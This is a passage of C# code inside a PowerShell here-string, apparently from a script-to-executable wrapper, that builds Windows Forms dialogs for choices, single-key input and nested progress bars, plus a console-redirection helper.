ChoiceBox\r\n\t{\r\n\t\tpublic static int Show(System.Collections.ObjectModel.Collection<ChoiceDescription> aAuswahl, int iVorgabe, string sTitle, string sPrompt)\r\n\t\t{\r\n\t\t\t// cancel if array is empty\r\n\t\t\tif (aAuswahl == null) return -1;\r\n\t\t\tif (aAuswahl.Count < 1) return -1;\r\n\r\n\t\t\t// 
Generate controls\r\n\t\t\tForm form = new Form();\r\n\t\t\tform.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\tform.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\t\t\tRadioButton[] aradioButton = new RadioButton[aAuswahl.Count];\r\n\t\t\tToolTip toolTip = new ToolTip();\r\n\t\t\tButton buttonOk = new Button();\r\n\r\n\t\t\t// Sizes and positions are defined according to the label\r\n\t\t\t// This control has to be finished first when a prompt is available\r\n\t\t\tint iPosY = 19, iMaxX = 0;\r\n\t\t\tif (!string.IsNullOrEmpty(sPrompt))\r\n\t\t\t{\r\n\t\t\t\tLabel label = new Label();\r\n\t\t\t\tlabel.Text = sPrompt;\r\n\t\t\t\tlabel.Location = new Point(9, 19);\r\n\t\t\t\tlabel.MaximumSize = new System.Drawing.Size(System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18, 0);\r\n\t\t\t\tlabel.AutoSize = true;\r\n\t\t\t\t// the size of the label is only determined by Add()\r\n\t\t\t\tform.Controls.Add(label);\r\n\t\t\t\tiPosY = label.Bottom;\r\n\t\t\t\tiMaxX = label.Right;\r\n\t\t\t}\r\n\r\n\t\t\t// The remaining sizes and positions are defined according to the radio buttons\r\n\t\t\t// So these controls have to be finished now\r\n\t\t\tint Counter = 0;\r\n\t\t\tint tempWidth = System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18;\r\n\t\t\tforeach (ChoiceDescription sAuswahl in aAuswahl)\r\n\t\t\t{\r\n\t\t\t\taradioButton[Counter] = new RadioButton();\r\n\t\t\t\taradioButton[Counter].Text = sAuswahl.Label;\r\n\t\t\t\tif (Counter == iVorgabe)\r\n\t\t\t\t\taradioButton[Counter].Checked = true;\r\n\t\t\t\taradioButton[Counter].Location = new Point(9, iPosY);\r\n\t\t\t\taradioButton[Counter].AutoSize = true;\r\n\t\t\t\t// the size of the radio button is only determined by Add()\r\n\t\t\t\tform.Controls.Add(aradioButton[Counter]);\r\n\t\t\t\tif (aradioButton[Counter].Width > tempWidth)\r\n\t\t\t\t{ // radio field too wide for screen -> make two lines\r\n\t\t\t\t\tint tempHeight = 
aradioButton[Counter].Height;\r\n\t\t\t\t\taradioButton[Counter].Height = tempHeight*(1 + (aradioButton[Counter].Width-1)/tempWidth);\r\n\t\t\t\t\taradioButton[Counter].Width = tempWidth;\r\n\t\t\t\t\taradioButton[Counter].AutoSize = false;\r\n\t\t\t\t}\r\n\t\t\t\tiPosY = aradioButton[Counter].Bottom;\r\n\t\t\t\tif (aradioButton[Counter].Right > iMaxX) { iMaxX = aradioButton[Counter].Right; }\r\n\t\t\t\tif (!string.IsNullOrEmpty(sAuswahl.HelpMessage))\r\n\t\t\t\t\t toolTip.SetToolTip(aradioButton[Counter], sAuswahl.HelpMessage);\r\n\t\t\t\tCounter++;\r\n\t\t\t}\r\n\r\n\t\t\t// show the tooltip even when the parent window is inactive\r\n\t\t\ttoolTip.ShowAlways = true;\r\n\r\n\t\t\t// Generate button\r\n\t\t\tbuttonOk.Text = \"OK\";\r\n\t\t\tbuttonOk.DialogResult = DialogResult.OK;\r\n\t\t\tbuttonOk.SetBounds(System.Math.Max(12, iMaxX - 77), iPosY + 36, 75, 23);\r\n\r\n\t\t\t// configure form\r\n\t\t\tif (string.IsNullOrEmpty(sTitle))\r\n\t\t\t\tform.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\telse\r\n\t\t\t\tform.Text = sTitle;\r\n\t\t\tform.ClientSize = new System.Drawing.Size(System.Math.Max(178, iMaxX + 10), iPosY + 71);\r\n\t\t\tform.Controls.Add(buttonOk);\r\n\t\t\tform.FormBorderStyle = FormBorderStyle.FixedDialog;\r\n\t\t\tform.StartPosition = FormStartPosition.CenterScreen;\r\n\t\t\ttry {\r\n\t\t\t\tform.Icon = Icon.ExtractAssociatedIcon(Assembly.GetExecutingAssembly().Location);\r\n\t\t\t}\r\n\t\t\tcatch\r\n\t\t\t{ }\r\n\t\t\tform.MinimizeBox = false;\r\n\t\t\tform.MaximizeBox = false;\r\n\t\t\tform.AcceptButton = buttonOk;\r\n\r\n\t\t\t// show and compute form\r\n\t\t\tif (form.ShowDialog() == DialogResult.OK)\r\n\t\t\t{ int iRueck = -1;\r\n\t\t\t\tfor (Counter = 0; Counter < aAuswahl.Count; Counter++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif (aradioButton[Counter].Checked == true)\r\n\t\t\t\t\t{ iRueck = Counter; }\r\n\t\t\t\t}\r\n\t\t\t\treturn iRueck;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class 
ReadKeyBox\r\n\t{\r\n\t\t[DllImport(\"user32.dll\")]\r\n\t\tpublic static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpKeyState,\r\n\t\t\t[Out, MarshalAs(UnmanagedType.LPWStr, SizeConst = 64)] System.Text.StringBuilder pwszBuff,\r\n\t\t\tint cchBuff, uint wFlags);\r\n\r\n\t\tstatic string GetCharFromKeys(Keys keys, bool bShift, bool bAltGr)\r\n\t\t{\r\n\t\t\tSystem.Text.StringBuilder buffer = new System.Text.StringBuilder(64);\r\n\t\t\tbyte[] keyboardState = new byte[256];\r\n\t\t\tif (bShift)\r\n\t\t\t{ keyboardState[(int) Keys.ShiftKey] = 0xff; }\r\n\t\t\tif (bAltGr)\r\n\t\t\t{ keyboardState[(int) Keys.ControlKey] = 0xff;\r\n\t\t\t\tkeyboardState[(int) Keys.Menu] = 0xff;\r\n\t\t\t}\r\n\t\t\tif (ToUnicode((uint) keys, 0, keyboardState, buffer, 64, 0) >= 1)\r\n\t\t\t\treturn buffer.ToString();\r\n\t\t\telse\r\n\t\t\t\treturn \"\\0\";\r\n\t\t}\r\n\r\n\t\tclass KeyboardForm : Form\r\n\t\t{\r\n\t\t\tpublic KeyboardForm()\r\n\t\t\t{\r\n\t\t\t\tthis.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\t\tthis.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\t\t\t\tthis.KeyDown += new KeyEventHandler(KeyboardForm_KeyDown);\r\n\t\t\t\tthis.KeyUp += new KeyEventHandler(KeyboardForm_KeyUp);\r\n\t\t\t}\r\n\r\n\t\t\t// check for KeyDown or KeyUp?\r\n\t\t\tpublic bool checkKeyDown = true;\r\n\t\t\t// key code for pressed key\r\n\t\t\tpublic KeyInfo keyinfo;\r\n\r\n\t\t\tvoid KeyboardForm_KeyDown(object sender, KeyEventArgs e)\r\n\t\t\t{\r\n\t\t\t\tif (checkKeyDown)\r\n\t\t\t\t{ // store key info\r\n\t\t\t\t\tkeyinfo.VirtualKeyCode = e.KeyValue;\r\n\t\t\t\t\tkeyinfo.Character = GetCharFromKeys(e.KeyCode, e.Shift, e.Alt & e.Control)[0];\r\n\t\t\t\t\tkeyinfo.KeyDown = false;\r\n\t\t\t\t\tkeyinfo.ControlKeyState = 0;\r\n\t\t\t\t\tif (e.Alt) { keyinfo.ControlKeyState = ControlKeyStates.LeftAltPressed | ControlKeyStates.RightAltPressed; }\r\n\t\t\t\t\tif (e.Control)\r\n\t\t\t\t\t{ keyinfo.ControlKeyState |= ControlKeyStates.LeftCtrlPressed | 
ControlKeyStates.RightCtrlPressed;\r\n\t\t\t\t\t\tif (!e.Alt)\r\n\t\t\t\t\t\t{ if (e.KeyValue > 64 && e.KeyValue < 96) keyinfo.Character = (char)(e.KeyValue - 64); }\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif (e.Shift) { keyinfo.ControlKeyState |= ControlKeyStates.ShiftPressed; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.CapsLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.CapsLockOn; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.NumLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.NumLockOn; }\r\n\t\t\t\t\t// and close the form\r\n\t\t\t\t\tthis.Close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tvoid KeyboardForm_KeyUp(object sender, KeyEventArgs e)\r\n\t\t\t{\r\n\t\t\t\tif (!checkKeyDown)\r\n\t\t\t\t{ // store key info\r\n\t\t\t\t\tkeyinfo.VirtualKeyCode = e.KeyValue;\r\n\t\t\t\t\tkeyinfo.Character = GetCharFromKeys(e.KeyCode, e.Shift, e.Alt & e.Control)[0];\r\n\t\t\t\t\tkeyinfo.KeyDown = true;\r\n\t\t\t\t\tkeyinfo.ControlKeyState = 0;\r\n\t\t\t\t\tif (e.Alt) { keyinfo.ControlKeyState = ControlKeyStates.LeftAltPressed | ControlKeyStates.RightAltPressed; }\r\n\t\t\t\t\tif (e.Control)\r\n\t\t\t\t\t{ keyinfo.ControlKeyState |= ControlKeyStates.LeftCtrlPressed | ControlKeyStates.RightCtrlPressed;\r\n\t\t\t\t\t\tif (!e.Alt)\r\n\t\t\t\t\t\t{ if (e.KeyValue > 64 && e.KeyValue < 96) keyinfo.Character = (char)(e.KeyValue - 64); }\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif (e.Shift) { keyinfo.ControlKeyState |= ControlKeyStates.ShiftPressed; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.CapsLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.CapsLockOn; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.NumLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.NumLockOn; }\r\n\t\t\t\t\t// and close the form\r\n\t\t\t\t\tthis.Close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic static KeyInfo Show(string sTitle, string sPrompt, bool bIncludeKeyDown)\r\n\t\t{\r\n\t\t\t// Generate controls\r\n\t\t\tKeyboardForm form = new 
KeyboardForm();\r\n\t\t\tLabel label = new Label();\r\n\r\n\t\t\t// Sizes and positions are defined according to the label\r\n\t\t\t// This control has to be finished first\r\n\t\t\tif (string.IsNullOrEmpty(sPrompt))\r\n\t\t\t{\r\n\t\t\t\t\tlabel.Text = \"Press a key\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tlabel.Text = sPrompt;\r\n\t\t\tlabel.Location = new Point(9, 19);\r\n\t\t\tlabel.MaximumSize = new System.Drawing.Size(System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18, 0);\r\n\t\t\tlabel.AutoSize = true;\r\n\t\t\t// the size of the label is only determined by Add()\r\n\t\t\tform.Controls.Add(label);\r\n\r\n\t\t\t// configure form\r\n\t\t\tif (string.IsNullOrEmpty(sTitle))\r\n\t\t\t\tform.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\telse\r\n\t\t\t\tform.Text = sTitle;\r\n\t\t\tform.ClientSize = new System.Drawing.Size(System.Math.Max(178, label.Right + 10), label.Bottom + 55);\r\n\t\t\tform.FormBorderStyle = FormBorderStyle.FixedDialog;\r\n\t\t\tform.StartPosition = FormStartPosition.CenterScreen;\r\n\t\t\ttry {\r\n\t\t\t\tform.Icon = Icon.ExtractAssociatedIcon(Assembly.GetExecutingAssembly().Location);\r\n\t\t\t}\r\n\t\t\tcatch\r\n\t\t\t{ }\r\n\t\t\tform.MinimizeBox = false;\r\n\t\t\tform.MaximizeBox = false;\r\n\r\n\t\t\t// show and compute form\r\n\t\t\tform.checkKeyDown = bIncludeKeyDown;\r\n\t\t\tform.ShowDialog();\r\n\t\t\treturn form.keyinfo;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class ProgressForm : Form\r\n\t{\r\n\t\tprivate ConsoleColor ProgressBarColor = ConsoleColor.DarkCyan;\r\n\r\n\t\tstruct ProgressData\r\n\t\t{\r\n\t\t\tinternal Label lblActivity;\r\n\t\t\tinternal Label lblStatus;\r\n\t\t\tinternal ProgressBar objProgressBar;\r\n\t\t\tinternal Label lblRemainingTime;\r\n\t\t\tinternal Label lblOperation;\r\n\t\t\tinternal int ActivityId;\r\n\t\t\tinternal int ParentActivityId;\r\n\t\t\tinternal int Depth;\r\n\t\t};\r\n\r\n\t\tprivate List<ProgressData> progressDataList = new List<ProgressData>();\r\n\r\n\t\tprivate 
Color DrawingColor(ConsoleColor color)\r\n\t\t{  // convert ConsoleColor to System.Drawing.Color\r\n\t\t\tswitch (color)\r\n\t\t\t{\r\n\t\t\t\tcase ConsoleColor.Black: return Color.Black;\r\n\t\t\t\tcase ConsoleColor.Blue: return Color.Blue;\r\n\t\t\t\tcase ConsoleColor.Cyan: return Color.Cyan;\r\n\t\t\t\tcase ConsoleColor.DarkBlue: return ColorTranslator.FromHtml(\"#000080\");\r\n\t\t\t\tcase ConsoleColor.DarkGray: return ColorTranslator.FromHtml(\"#808080\");\r\n\t\t\t\tcase ConsoleColor.DarkGreen: return ColorTranslator.FromHtml(\"#008000\");\r\n\t\t\t\tcase ConsoleColor.DarkCyan: return ColorTranslator.FromHtml(\"#008080\");\r\n\t\t\t\tcase ConsoleColor.DarkMagenta: return ColorTranslator.FromHtml(\"#800080\");\r\n\t\t\t\tcase ConsoleColor.DarkRed: return ColorTranslator.FromHtml(\"#800000\");\r\n\t\t\t\tcase ConsoleColor.DarkYellow: return ColorTranslator.FromHtml(\"#808000\");\r\n\t\t\t\tcase ConsoleColor.Gray: return ColorTranslator.FromHtml(\"#C0C0C0\");\r\n\t\t\t\tcase ConsoleColor.Green: return ColorTranslator.FromHtml(\"#00FF00\");\r\n\t\t\t\tcase ConsoleColor.Magenta: return Color.Magenta;\r\n\t\t\t\tcase ConsoleColor.Red: return Color.Red;\r\n\t\t\t\tcase ConsoleColor.White: return Color.White;\r\n\t\t\t\tdefault: return Color.Yellow;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprivate void InitializeComponent()\r\n\t\t{\r\n\t\t\tthis.SuspendLayout();\r\n\r\n\t\t\tthis.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\tthis.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\r\n\t\t\tthis.AutoScroll = true;\r\n\t\t\tthis.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\tthis.Height = 147;\r\n\t\t\tthis.Width = 800;\r\n\t\t\tthis.BackColor = Color.White;\r\n\t\t\tthis.FormBorderStyle = FormBorderStyle.FixedSingle;\r\n\t\t\tthis.MinimizeBox = false;\r\n\t\t\tthis.MaximizeBox = false;\r\n\t\t\tthis.ControlBox = false;\r\n\t\t\tthis.StartPosition = 
FormStartPosition.CenterScreen;\r\n\r\n\t\t\tthis.ResumeLayout();\r\n\t\t}\r\n\r\n\t\tprivate void AddBar(ref ProgressData pd, int position)\r\n\t\t{\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblActivity = new Label();\r\n\t\t\tpd.lblActivity.Left = 5;\r\n\t\t\tpd.lblActivity.Top = 104*position + 10;\r\n\t\t\tpd.lblActivity.Width = 800 - 20;\r\n\t\t\tpd.lblActivity.Height = 16;\r\n\t\t\tpd.lblActivity.Font = new Font(pd.lblActivity.Font, FontStyle.Bold);\r\n\t\t\tpd.lblActivity.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblActivity);\r\n\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblStatus = new Label();\r\n\t\t\tpd.lblStatus.Left = 25;\r\n\t\t\tpd.lblStatus.Top = 104*position + 26;\r\n\t\t\tpd.lblStatus.Width = 800 - 40;\r\n\t\t\tpd.lblStatus.Height = 16;\r\n\t\t\tpd.lblStatus.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblStatus);\r\n\r\n\t\t\t// Create ProgressBar\r\n\t\t\tpd.objProgressBar = new ProgressBar();\r\n\t\t\tpd.objProgressBar.Value = 0;\r\n$(if ($noVisualStyles) {@\"\r\n\t\t\tpd.objProgressBar.Style = ProgressBarStyle.Continuous;\r\n\"@ } else {@\"\r\n\t\t\tpd.objProgressBar.Style = ProgressBarStyle.Blocks;\r\n\"@ })\r\n\t\t\tpd.objProgressBar.ForeColor = DrawingColor(ProgressBarColor);\r\n\t\t\tif (pd.Depth < 15)\r\n\t\t\t{\r\n\t\t\t\tpd.objProgressBar.Size = new System.Drawing.Size(800 - 60 - 30*pd.Depth, 20);\r\n\t\t\t\tpd.objProgressBar.Left = 25 + 30*pd.Depth;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tpd.objProgressBar.Size = new System.Drawing.Size(800 - 60 - 450, 20);\r\n\t\t\t\tpd.objProgressBar.Left = 25 + 450;\r\n\t\t\t}\r\n\t\t\tpd.objProgressBar.Top = 104*position + 47;\r\n\t\t\t// Add ProgressBar to Form\r\n\t\t\tthis.Controls.Add(pd.objProgressBar);\r\n\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblRemainingTime = new Label();\r\n\t\t\tpd.lblRemainingTime.Left = 5;\r\n\t\t\tpd.lblRemainingTime.Top = 104*position + 72;\r\n\t\t\tpd.lblRemainingTime.Width = 800 - 
20;\r\n\t\t\tpd.lblRemainingTime.Height = 16;\r\n\t\t\tpd.lblRemainingTime.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblRemainingTime);\r\n\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblOperation = new Label();\r\n\t\t\tpd.lblOperation.Left = 25;\r\n\t\t\tpd.lblOperation.Top = 104*position + 88;\r\n\t\t\tpd.lblOperation.Width = 800 - 40;\r\n\t\t\tpd.lblOperation.Height = 16;\r\n\t\t\tpd.lblOperation.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblOperation);\r\n\t\t}\r\n\r\n\t\tpublic int GetCount()\r\n\t\t{\r\n\t\t\treturn progressDataList.Count;\r\n\t\t}\r\n\r\n\t\tpublic ProgressForm()\r\n\t\t{\r\n\t\t\tInitializeComponent();\r\n\t\t}\r\n\r\n\t\tpublic ProgressForm(ConsoleColor BarColor)\r\n\t\t{\r\n\t\t\tProgressBarColor = BarColor;\r\n\t\t\tInitializeComponent();\r\n\t\t}\r\n\r\n\t\tpublic void Update(ProgressRecord objRecord)\r\n\t\t{\r\n\t\t\tif (objRecord == null)\r\n\t\t\t\treturn;\r\n\r\n\t\t\tint currentProgress = -1;\r\n\t\t\tfor (int i = 0; i < progressDataList.Count; i++)\r\n\t\t\t{\r\n\t\t\t\tif (progressDataList[i].ActivityId == objRecord.ActivityId)\r\n\t\t\t\t{ currentProgress = i;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif (objRecord.RecordType == ProgressRecordType.Completed)\r\n\t\t\t{\r\n\t\t\t\tif (currentProgress < 0) 
return;\r\n\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblActivity);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblStatus);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].objProgressBar);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblRemainingTime);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblOperation);\r\n\r\n\t\t\t\tprogressDataList[currentProgress].lblActivity.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].lblStatus.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].objProgressBar.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].lblRemainingTime.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].lblOperation.Dispose();\r\n\r\n\t\t\t\tprogressDataList.RemoveAt(currentProgress);\r\n\r\n\t\t\t\tif (progressDataList.Count == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Close();\r\n\t\t\t\t\treturn;\r\n\t\t\t\t}\r\n\r\n\t\t\t\tfor (int i = currentProgress; i < progressDataList.Count; i++)\r\n\t\t\t\t{\r\n\t\t\t\t\tprogressDataList[i].lblActivity.Top = 104*i + 10;\r\n\t\t\t\t\tprogressDataList[i].lblStatus.Top = 104*i + 26;\r\n\t\t\t\t\tprogressDataList[i].objProgressBar.Top = 104*i + 47;\r\n\t\t\t\t\tprogressDataList[i].lblRemainingTime.Top = 104*i + 72;\r\n\t\t\t\t\tprogressDataList[i].lblOperation.Top = 104*i + 88;\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (104*progressDataList.Count + 43 <= System.Windows.Forms.Screen.FromControl(this).Bounds.Height)\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = 104*progressDataList.Count + 43;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, (System.Windows.Forms.Screen.FromControl(this).Bounds.Height - this.Height)/2);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = System.Windows.Forms.Screen.FromControl(this).Bounds.Height;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - 
this.Width)/2, 0);\r\n\t\t\t\t}\r\n\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\r\n\t\t\tif (currentProgress < 0)\r\n\t\t\t{\r\n\t\t\t\tProgressData pd = new ProgressData();\r\n\t\t\t\tpd.ActivityId = objRecord.ActivityId;\r\n\t\t\t\tpd.ParentActivityId = objRecord.ParentActivityId;\r\n\t\t\t\tpd.Depth = 0;\r\n\r\n\t\t\t\tint nextid = -1;\r\n\t\t\t\tint parentid = -1;\r\n\t\t\t\tif (pd.ParentActivityId >= 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tfor (int i = 0; i < progressDataList.Count; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (progressDataList[i].ActivityId == pd.ParentActivityId)\r\n\t\t\t\t\t\t{ parentid = i;\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (parentid >= 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tpd.Depth = progressDataList[parentid].Depth + 1;\r\n\r\n\t\t\t\t\tfor (int i = parentid + 1; i < progressDataList.Count; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif ((progressDataList[i].Depth < pd.Depth) || ((progressDataList[i].Depth == pd.Depth) && (progressDataList[i].ParentActivityId != pd.ParentActivityId)))\r\n\t\t\t\t\t\t{ nextid = i;\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (nextid == -1)\r\n\t\t\t\t{\r\n\t\t\t\t\tAddBar(ref pd, progressDataList.Count);\r\n\t\t\t\t\tcurrentProgress = progressDataList.Count;\r\n\t\t\t\t\tprogressDataList.Add(pd);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tAddBar(ref pd, nextid);\r\n\t\t\t\t\tcurrentProgress = nextid;\r\n\t\t\t\t\tprogressDataList.Insert(nextid, pd);\r\n\r\n\t\t\t\t\tfor (int i = currentProgress+1; i < progressDataList.Count; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprogressDataList[i].lblActivity.Top = 104*i + 10;\r\n\t\t\t\t\t\tprogressDataList[i].lblStatus.Top = 104*i + 26;\r\n\t\t\t\t\t\tprogressDataList[i].objProgressBar.Top = 104*i + 47;\r\n\t\t\t\t\t\tprogressDataList[i].lblRemainingTime.Top = 104*i + 72;\r\n\t\t\t\t\t\tprogressDataList[i].lblOperation.Top = 104*i + 88;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif (104*progressDataList.Count + 43 
<= System.Windows.Forms.Screen.FromControl(this).Bounds.Height)\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = 104*progressDataList.Count + 43;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, (System.Windows.Forms.Screen.FromControl(this).Bounds.Height - this.Height)/2);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = System.Windows.Forms.Screen.FromControl(this).Bounds.Height;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, 0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif (!string.IsNullOrEmpty(objRecord.Activity))\r\n\t\t\t\tprogressDataList[currentProgress].lblActivity.Text = objRecord.Activity;\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblActivity.Text = \"\";\r\n\r\n\t\t\tif (!string.IsNullOrEmpty(objRecord.StatusDescription))\r\n\t\t\t\tprogressDataList[currentProgress].lblStatus.Text = objRecord.StatusDescription;\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblStatus.Text = \"\";\r\n\r\n\t\t\tif ((objRecord.PercentComplete >= 0) && (objRecord.PercentComplete <= 100))\r\n\t\t\t{\r\n\t\t\t\tprogressDataList[currentProgress].objProgressBar.Value = objRecord.PercentComplete;\r\n\t\t\t\tprogressDataList[currentProgress].objProgressBar.Visible = true;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{ if (objRecord.PercentComplete > 100)\r\n\t\t\t\t{\r\n\t\t\t\t\tprogressDataList[currentProgress].objProgressBar.Value = 0;\r\n\t\t\t\t\tprogressDataList[currentProgress].objProgressBar.Visible = true;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t\tprogressDataList[currentProgress].objProgressBar.Visible = false;\r\n\t\t\t}\r\n\r\n\t\t\tif (objRecord.SecondsRemaining >= 0)\r\n\t\t\t{\r\n\t\t\t\tSystem.TimeSpan objTimeSpan = new System.TimeSpan(0, 0, objRecord.SecondsRemaining);\r\n\t\t\t\tprogressDataList[currentProgress].lblRemainingTime.Text = \"Remaining time: \" + string.Format(\"{0:00}:{1:00}:{2:00}\", 
(int)objTimeSpan.TotalHours, objTimeSpan.Minutes, objTimeSpan.Seconds);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblRemainingTime.Text = \"\";\r\n\r\n\t\t\tif (!string.IsNullOrEmpty(objRecord.CurrentOperation))\r\n\t\t\t\tprogressDataList[currentProgress].lblOperation.Text = objRecord.CurrentOperation;\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblOperation.Text = \"\";\r\n\r\n\t\t\tApplication.DoEvents();\r\n\t\t}\r\n\t}\r\n\"@})\r\n\r\n\t// define IsInputRedirected(), IsOutputRedirected() and IsErrorRedirected() here since they were introduced first with .Net 4.5\r\n\tpublic class ConsoleInfo\r\n\t{\r\n\t\tprivate enum FileType : uint\r\n\t\t{\r\n\t\t\tFILE_TYPE_UNKNOWN = 0x0000,\r\n\t\t\tFILE_TYPE_DISK = 0x0001,\r\n\t\t\tFILE_TYPE_CHAR = 0x0002,\r\n\t\t\tFILE_TYPE_PIPE = 0x0003,\r\n\t\t\tFILE_TYPE_REMOTE = 0x8000\r\n\t\t}\r\n\r\n\t\tprivate enum STDHandle : uint\r\n\t\t{\r\n\t\t\tSTD_INPUT_HANDLE = unchecked((uint)-10),\r\n\t\t\tSTD_OUTPUT_HANDLE = unchecked((uint)-11),\r\n\t\t\tSTD_ERROR_HANDLE = unchecked((uint)-12)\r\n\t\t}\r\n\r\n\t\t[DllImport(\"Kernel32.dll\")]\r\n\t\tstatic private extern UIntPtr GetStdHandle(STDHandle stdHandle);\r\n\r\n\t\t[DllImport(\"Kernel32.dll\")]\r\n\t\tstatic private extern FileType GetFileType(UIntPtr hFile);\r\n\r\n\t\tstatic public bool IsInputRedirected()\r\n\t\t{\r\n\t\t\tUIntPtr hInput = GetStdHandle(STDHandle.STD_INPUT_HANDLE);\r\n\t\t\tFileType fileType = (FileType)GetFileType(hInput);\r\n\t\t\tif ((fileType == FileType.FILE_TYPE_CHAR) || (fileType == FileType.FILE_TYPE_UNKNOWN))\r\n\t\t\t\treturn false;\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\tstatic public bool IsOutputRedirected()\r\n\t\t{\r\n\t\t\tUIntPtr hOutput = GetStdHandle(STDHandle.STD_OUTPUT_HANDLE);\r\n\t\t\tFileType fileType = (FileType)GetFileType(hOutput);\r\n\t\t\tif ((fileType == FileType.FILE_TYPE_CHAR) || (fileType == FileType.FILE_TYPE_UNKNOWN))\r\n\t\t\t\treturn false;\r\n\t\t\treturn 
